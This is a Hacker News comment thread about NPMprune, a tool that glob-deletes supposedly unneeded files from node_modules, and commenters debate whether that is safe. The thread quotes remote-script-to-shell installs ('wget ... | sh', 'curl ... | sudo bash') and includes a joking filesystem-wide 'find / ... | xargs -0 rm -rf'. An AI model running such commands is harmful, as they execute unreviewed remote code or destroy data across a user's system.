[HN Gopher] NPMprune: Remove unnecessary files from node_modules...
       ___________________________________________________________________
        
       NPMprune: Remove unnecessary files from node_modules to optimize
       storage
        
       Author : arthurwhite
       Score  : 36 points
       Date   : 2023-11-29 17:14 UTC (5 hours ago)
        
 (HTM) web link (github.com)
 (TXT) w3m dump (github.com)
        
       | lxe wrote:
       | We did exactly this when packaging and deploying large node
       | manifests at one of my former companies.
       | 
       | Be super careful of removing large swaths of files. Out of
       | 150,000 node modules in your manifest, I'm willing to bet at
       | least one of them is doing something by reading one of these non-
       | source files.
        
         | sbarre wrote:
         | This was my concern as well.
         | 
         | Looking at the script source, it's just matching globs, so
         | there isn't much smarts to this. I'm sure it works most of the
         | time, but yeah..
         | 
         | Do JS packages need some kind of .prodignore file similar to
         | other .ignore files?
         | 
         | So with a flag passed, after doing an npm install, there's a
         | extra cleanup step that removes explicitly marked files that
         | aren't needed for running in prod?
         | 
         | (Not a fully formed idea, I'm sure I'm not thinking of
         | drawbacks with this)
         | 
         | Edit: this sort of exists as the .npmignore file?
         | 
         | https://docs.npmjs.com/cli/v10/using-npm/developers#keeping-...
        
           | rezonant wrote:
           | .npmignore is the opposite of `files`, it omits files when
           | creating the package itself, that's different than trimming
           | the files when the package is installed. That said,
           | files/npmignore is the correct way to deal with this and you
           | should never remove files from the packages you install
           | without extremely good reasons, and when you do it, it should
           | be very narrowly scoped and handled automatically as part of
           | npm install. It should be totally valid to delete
           | node_modules and reinstall everything without causing
           | problems. This is also the biggest reason to never commit
           | node_modules, aside from the pure insanity of commiting
           | hundreds of thousands of vendor managed files and inviting
           | merge conflicts when two branches change those files...
        
         | QuadmasterXLII wrote:
         | Test and bifurcate I guess.
        
           | lxe wrote:
           | In production, preferably. This way you'll immediately find
           | any issues and will have top priority allocated to fixing
           | them.
        
       | armchairhacker wrote:
       | I use https://pnpm.io whenever possible. It has many benefits,
       | the main one is that the node modules are symlinked to one big
       | repo in your home directory, so there isn't nearly as much
       | duplication.
        
         | rpastuszak wrote:
         | Yup, same here. I've saved 40gb of data by recursively removing
         | all node_modules directories from my Mac and replacing npm with
         | pnpm.
         | 
         | I did notice small issues with some libraries (react testing
         | library IIRC)
        
         | paulddraper wrote:
         | *hard linked
        
         | akoboldfrying wrote:
         | Curious whether this works on Windows? Symlinks are strange
         | there (though hard links work fine on NTFS).
        
           | otteromkram wrote:
           | If you don't want to risk adding something nefarious to your
           | Google history, DuckDuckGo is a nice alternative.
           | 
           | As my ol' grandpappy used to say, "Why wonder? Let's go
           | search the Internets!"
        
         | thekevinscott wrote:
         | Another vote for pnpm.
         | 
         | Was introduced at work and it's a game changer. The monorepo
         | support (via "workspace:*") is absolutely clutch too.
        
       | swatcoder wrote:
       | > In deployment scripts:
       | 
       | >
       | 
       | > wget -qO-
       | https://raw.githubusercontent.com/xthezealot/npmprune/master... |
       | sh -- -p
       | 
       | Serious question: Is this the norm now? Are people actually
       | executing unversioned wget'd shell scripts from random github
       | users as part of their deployment workflow?
        
         | petesergeant wrote:
         | > now
         | 
         | For about the last 15 years
        
           | mobilio wrote:
           | also
           | 
           | curl ... | sudo bash
        
           | dunham wrote:
           | And before the web existed, people would distribute software
           | packaged inside executable shell scripts
           | (https://en.wikipedia.org/wiki/Shar).
           | 
           | It looks like that practice goes back at least 40 years.
        
         | nailer wrote:
         | The threat model is exactly the same as executing untrusted,
         | uninspected content you've downloaded locally.
         | 
         | I could do some tricks where I sent different files based on
         | user agent, but still... most people aren't inspecting the
         | download anyway before running it.
        
           | im3w1l wrote:
           | > I could do some tricks where I sent different files based
           | on user agent
           | 
           | Not from githubusercontent you couldn't. Which I'd say is
           | where the majority of these scripts are hosted.
        
       | c0n5pir4cy wrote:
       | Just for package authors (or people looking for some easy pull
       | requests) out there that might not know this exists.
       | 
       | NPMs package.json has a `files` field which allows you to define
       | which files are included on an npm install:
       | https://docs.npmjs.com/cli/v6/configuring-npm/package-json#f....
       | 
       | This also extends to an .npmignore file that works similar to a
       | .gitignore file.
        
         | creatonez wrote:
         | Just beware that some files may seem unnecessary but are
         | expected from an idiomatic npm package. Three things that come
         | to mind -- a markdown file named README.md, any generated
         | typescript definitions, and typescript/babel sourcemaps. And
         | something I've seen far too often: please don't give a
         | minified, rolled up bundle as the only option, otherwise you
         | are chucking your library's users back into the dark ages of
         | Bower.js.
        
           | nfriedly wrote:
           | The readme gets included automatically even if you don't
           | specify it in the files field, ditto for the changelog
           | license, and package.json.
           | 
           | Compare https://github.com/express-rate-limit/express-rate-
           | limit/blo... to https://www.npmjs.com/package/express-rate-
           | limit?activeTab=c...
           | 
           | Agree with you about the other points.
        
           | rezonant wrote:
           | Strongly agree on minification. You should not minify or
           | bundle anything in your NPM package. That decision should
           | only be made by the top level project if it wishes.
        
           | josephg wrote:
           | Yep. And if you're writing typescript, please include type
           | definitions, source maps, type definition source maps and the
           | original typescript source.
           | 
           | Having all of this stuff makes it possible to ctrl+click on
           | functions in my libraries and read the corresponding source
           | code. That's a godsend during development - well worth a few
           | extra kb of files in the npm module.
           | 
           | tsconfig.json:                   "declaration": true,
           | "declarationMap": true,         "sourceMap": true,
           | ...
           | 
           | package.json (assuming typescript compiles src/ to dist/):
           | "files": [           "dist/*",           "src/*"         ],
        
             | shepherdjerred wrote:
             | It makes me wonder why these are even configurable. These
             | should all be emitted by default.
        
         | arthurwhite wrote:
         | If everyone used the `file` field, the world would be a better
         | place, for sure.
        
       | an_ko wrote:
       | This is wildly unsafe.
       | 
       | - Some packages contain non-JS files for good reasons, and they
       | may break in subtle unpredictable ways when you mess with the
       | contents of their package.
       | 
       | - Node.js will happily run JavaScript files even if they're not
       | "*.js": A file like "hello.alsdfhlshdfl" works just fine as long
       | as its content parses. There is no guarantee that your
       | dependencies (and their recursive dependencies) don't statically
       | or dynamically load files with completely arbitrary filenames.
       | 
       | - If you distribute packages with license files stripped this
       | way, you are violating licenses that require the license to be
       | distributed along with the code.
       | 
       | If this is actually a major issue for you, consider instead
       | sending PRs to upstream to tidy up their package. This will also
       | benefit other users.
        
         | arthurwhite wrote:
         | - Of course, this entails the risk of occasional breakage. But
         | for 99% of modules, this has no impact at runtime.
         | 
         | - The patterns used to find files are specific enough to target
         | only those files that are well known to be useless at runtime.
         | 
         | - The license texts of these libraries can be copied and merged
         | into a main LICENSE file.
         | 
         | - Have you seen the number of modules installed by most major
         | libraries? Making a pull request for each of them is humanly
         | impossible and counter-productive. It's easier to use a simple
         | script that releases dozens of MB in a few seconds.
        
           | swatcoder wrote:
           | > But for 99% of modules, this has no impact at runtime.
           | 
           | Traditionally, this wasn't an acceptable way to think about
           | projects we engineers were being paid lots of money to build.
           | 
           | As you note, a project may hoover in some absurd number of
           | dependent libraries and you have no tooling that tells you
           | which of those might fall in the 1% and what code paths in
           | those 1% intersect with call stacks in your project. You have
           | no idea what impact blindly deleting some "They're probably
           | unnecessary" files in somebody else's code will have on your
           | application and no insight into how to make sure your testing
           | unearths problems. It's an invitation to phantom bugs of
           | unknown scope and the most frustrating kind of debugging
           | effort that comes from chasing those kinds of phantoms.
           | 
           | It's already bad enough that people don't read and review
           | their dependent code with the eye they bring to PR's from
           | their on-team colleagues, but to then go futzing around and
           | deleting things in the unread dependencies because you have a
           | hunch that it's no big deal is about as far from software
           | _engineering_ as you can get.
        
           | akdor1154 wrote:
           | > but for 99% of modules, this has no impact at runtime
           | 
           | So for the typical enterprise crapware where the app template
           | installs about 2,000 packages for a React Hello World, how
           | many broken modules is that?
        
           | filterfiber wrote:
           | > Of course, this entails the risk of occasional breakage.
           | But for 99% of modules, this has no impact at runtime.
           | 
           | Right so most projects end up with 100's (random one I have
           | is 700+) modules. Which would mean multiple breakages.
           | 
           | The worst part isn't the breakage - it's not knowing where or
           | when it breaks, and because it could be missed when it's
           | being bundled it can happen in production.
           | 
           | The bundling step should effectively be doing the file
           | pruning for you (or even parts of files) and you can be a lot
           | more confident that won't miss things.
           | 
           | node_modules are generally big (580MB in my case), but I
           | don't know why you'd trade 580MB of storage for reliability.
           | For us the 580MB will get bundled under 1MB for our web
           | application, essentially all dev machines will be 512GB+ at
           | this point anyway.
        
       | pavlov wrote:
       | Why not use yarn? It has a much more reliable solution:
       | 
       | https://yarnpkg.com/features/pnp
        
         | arthurwhite wrote:
         | Because its primary focus is on redefining how dependencies are
         | stored and accessed, rather than modifying the contents of
         | these dependencies.
         | 
         | Useless files will still be there.
         | 
         | Also, when you create a Docker image, you avoid packing in dev
         | tools that aren't absolutely essential (such as Yarn).
        
           | butshouldyou wrote:
           | FYI: The default node Docker images already include yarn.
        
       | Alifatisk wrote:
       | Just use pnpm
        
         | arthurwhite wrote:
         | While pnpm optimizes storage and reduces duplication, it does
         | not inherently remove non-essential files (like documentation,
         | Markdown, or test files) within the dependencies.
         | 
         | Also, when you create a Docker image, you avoid packing in dev
         | tools that aren't absolutely essential (such as pnpm).
        
           | nusmella wrote:
           | Even the alpine nodejs images have pnpm and yarn nowadays
        
       | dlrush wrote:
       | Just use PNPM
        
       | Ayesh wrote:
       | Yeah no.
       | 
       | Npm already does it at the package registry with ignore/npmignore
       | files, and that's the package authors choice. How much storage
       | can you really save? 50MB? 200MB? is it really worth the risk of
       | running rm on some glob pattern and cross your fingers the
       | packages don't require any of the deleted files?
        
         | arthurwhite wrote:
         | Not everyone uses the .npmignore file. Maybe it's the author's
         | choice, but in the meantime, that's my personal storage space
         | that's being used unnecessarily.
         | 
         | I tested it recently on a clean install of Strapi: about 250 MB
         | are freed up. Storage is cheap but that still represents a lot,
         | especially inside a Docker image.
         | 
         | The patterns used to find files are specific enough to target
         | only those files that are well known to be useless at runtime.
        
           | rezonant wrote:
           | Others have pointed out that you have no idea which files are
           | useless at runtime when inspecting their filename. Executable
           | JS does not need the .js extension to be loaded by Node.js or
           | any other runtime environment, and on server runtimes files
           | can be read at runtime, so JSON files, markdown files,
           | webassembly modules, or any other kind of non-JS content can
           | have a runtime impact.
           | 
           | You are taking a big risk of subtle breakage right now, and a
           | big risk of breakage as you change your project code in the
           | future, as you may start to invoke a code path that needs
           | that resource in the future.
        
       | dmitrygr wrote:
       | > Remove unnecessary [...] node_modules
       | 
       | Try this bash one-liner :)                  find / -name
       | node_modules -print0 | xargs -0 rm -rf
        
       | leipert wrote:
       | Yarn@1 has this autoclean feature:
       | https://classic.yarnpkg.com/en/docs/cli/autoclean
       | 
       | I used to use it, but at some point the hassle of the
       | occasionally breaking package wasn't worth it.
        
       | mirekrusin wrote:
       | Just bundle your b/e production entrypoint as a single js file
       | similar to f/e.
        
       | joshmanders wrote:
       | Can someone explain to me why this is even necessary? I have at
       | the time of this comment, 32 node projects on my machine, all
       | with their own node_modules, and I'm using less than 200GB
       | (total, including everything else on my machine) of my total 1TB
       | hard drive space...
       | 
       | Are people that concerned about the size of a directory on their
       | machines?
        
         | arthurwhite wrote:
         | Maybe not on their machine, but for Docker images that will be
         | pulled a thousand times, yes.
        
       ___________________________________________________________________
       (page generated 2023-11-29 23:01 UTC)